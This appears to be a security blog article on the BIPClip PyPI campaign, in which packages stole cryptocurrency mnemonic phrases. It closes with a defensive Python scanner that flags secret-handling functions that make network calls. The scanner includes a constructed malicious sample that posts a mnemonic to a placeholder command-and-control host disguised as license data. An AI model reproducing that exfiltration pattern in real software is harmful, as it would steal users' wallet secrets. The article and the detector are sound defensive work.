BIPClip: Malicious Crypto-Targeting Campaign Uncovered on PyPI
A recently discovered campaign on the Python Package Index (PyPI) serves as a reminder of the evolving tactics used by cybercriminals to target lucrative cryptocurrency assets. Researchers at ReversingLabs uncovered a network of seven malicious packages designed to infiltrate cryptocurrency wallets, specifically targeting developers implementing Bitcoin Improvement Proposal 39 (BIP39).
The BIPClip Campaign: Targeting Crypto Developers
Dubbed “BIPClip”, the campaign used seven distinct malicious packages, published to PyPI in 19 different versions since December 2022, built to steal mnemonic phrases, the human-readable word lists used to back up and restore cryptocurrency wallets. The attackers sought to dupe developers working on Bitcoin Improvement Proposal 39 (BIP39) projects.
The campaign split its malware in two. A clean package delivered exactly the functionality it advertised, and pulled the actual malicious code in from a dependency through an ordinary import. Combined with function names borrowed from common cryptographic operations, this layout lowered the chance that a reviewer looking at the top-level package would notice anything wrong.
History and Impact
The genesis of BIPClip can be traced back to December 2022 and is linked to a GitHub repository. While the recently discovered packages had limited downloads, older versions may have had a wider impact.
The campaign’s intricacy lies in its exploitation of trust within the software development ecosystem. The initial discovery centered on two packages, mnemonic_to_address and bip39_mnemonic_decrypt: the latter carried the malicious functionality, while the former served as a facade of legitimacy. This duality of purpose—masking the nefarious intent within a seemingly benign wrapper—exemplifies the subtlety of modern supply chain attacks.
Notably, the malicious bip39_mnemonic_decrypt package was designed to exfiltrate captured mnemonic phrases to a command-and-control server, labelling the stolen data as innocuous license information so that it would pass security scrutiny.
Further investigation by ReversingLabs unveiled additional packages—public-address-generator, erc20-scanner, and hashdecrypts—expanding the campaign’s reach. These packages, while diverse in name, shared a common malicious thread, pointing to a centralized command and control infrastructure. The involvement of a seemingly reputable GitHub repository, HashSnake, in the campaign’s execution added another layer of complexity, revealing the operation’s extended timeline and broader impact.
The Need for Action
The cryptocurrency industry is a major target for cybercriminals, and supply chain attacks are an effective tool in their arsenal. Here’s what you can do:
- Developers: Thoroughly vet every open-source package and its dependencies before adopting it, prioritize security awareness, and follow rigorous secure-coding practices.
- Organizations: Conduct regular software hygiene assessments and implement software composition analysis (SCA) tools to continuously monitor for vulnerabilities.
- Individual Crypto Users: Store recovery phrases offline with extreme care. Exercise skepticism toward applications promising to help manage or secure your cryptocurrency assets.
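The two-part packaging described above (a clean facade that imports its payload from a dependency, with the secret later leaving the host in a field labelled as license data) is exactly what a package review should look for, and the advice to vet every open-source package is easier to follow with a little tooling. The script below is an added example written for this article; it is not code from ReversingLabs or from any of the packages named here. It parses Python sources with the standard-library ast module, lists what each file imports, and flags any function that both handles secret-looking identifiers (mnemonic, seed, phrase and similar) and calls a network API, then runs that check over every file of a package so that a payload hidden in a dependency is not skipped. The wrapper and dependency sources embedded at the bottom are constructed for the demo: the package names, the helper_dep module and the c2.example.invalid URL are placeholders, and NETWORK_CALLS is an assumed starting list to extend.

```python
import ast
from pathlib import Path
from typing import Dict, List

# Identifier fragments that suggest a function handles wallet secrets (assumed list).
SENSITIVE_TOKENS = ("mnemonic", "seed", "phrase", "privkey", "private_key")

# Fully qualified callees that send data off the host (assumed starting set).
NETWORK_CALLS = {
    "requests.post", "requests.get", "requests.put",
    "urllib.request.urlopen", "http.client.HTTPSConnection",
    "http.client.HTTPConnection", "socket.socket",
}


def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from a Name/Attribute chain; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def list_imports(source: str) -> List[str]:
    """Top-level module names a file imports: the route a clean facade uses to reach its payload."""
    mods = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            mods.add(node.module.split(".")[0])
    return sorted(mods)


def find_suspicious_functions(source: str, filename: str = "<module>") -> List[Dict]:
    """Flag functions that both touch secret-looking names and call out to the network."""
    findings = []
    for fn in ast.walk(ast.parse(source, filename)):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        # Parameter names plus every bare name referenced in the body.
        idents = {a.arg.lower() for a in fn.args.args}
        idents |= {n.id.lower() for n in ast.walk(fn) if isinstance(n, ast.Name)}
        handles_secret = any(tok in ident for ident in idents for tok in SENSITIVE_TOKENS)
        callees = {_dotted_name(c.func) for c in ast.walk(fn) if isinstance(c, ast.Call)}
        net_calls = sorted(callees & NETWORK_CALLS)
        if handles_secret and net_calls:
            findings.append({"file": filename, "function": fn.name,
                             "line": fn.lineno, "network_calls": net_calls})
    return findings


def vet_package(sources: Dict[str, str]) -> List[Dict]:
    """Run the check over every file, dependencies included, and merge the findings."""
    findings = []
    for path, src in sources.items():
        findings.extend(find_suspicious_functions(src, path))
    return findings


def load_package_sources(root: str) -> Dict[str, str]:
    """Read every .py file under a directory (e.g. a site-packages tree) into memory."""
    base = Path(root)
    return {str(p.relative_to(base)): p.read_text(encoding="utf-8", errors="replace")
            for p in base.rglob("*.py")}


# Constructed sample mirroring the two-part layout: a clean facade and a dependency
# that carries the payload. Package names and the URL are placeholders.
WRAPPER_SRC = '''
import helper_dep

def mnemonic_to_address(mnemonic):
    """Does what it advertises and hands the secret to the dependency."""
    return helper_dep.decrypt(mnemonic)
'''

DEP_SRC = '''
import hashlib
import requests

def derive(mnemonic_phrase, passphrase=""):
    # Legitimate-looking BIP39 key stretching: secret-named inputs, no network use.
    return hashlib.pbkdf2_hmac("sha512", mnemonic_phrase.encode(),
                               ("mnemonic" + passphrase).encode(), 2048)

def decrypt(mnemonic):
    key = derive(mnemonic)
    # The pattern the article describes: the secret leaves the host in a "license" field.
    requests.post("https://c2.example.invalid/license", json={"license": mnemonic})
    return key
'''

SAMPLE_PACKAGE = {"mnemonic_tools/__init__.py": WRAPPER_SRC,
                  "helper_dep/__init__.py": DEP_SRC}

if __name__ == "__main__":
    for finding in vet_package(SAMPLE_PACKAGE):
        print(finding)
```

Point load_package_sources at a freshly installed package's directory under site-packages, pass the result to vet_package, and review every hit by hand. The facade file in the sample produces no finding on its own; only scanning the dependency it imports surfaces the decrypt function, which is the point of walking the whole tree. The check is a heuristic: it deliberately leaves derive alone because secret-named parameters without a network call are normal in BIP39 code, and it is blind to calls reached through aliases, getattr or exec, so treat a clean report as a prompt for manual review rather than a verdict.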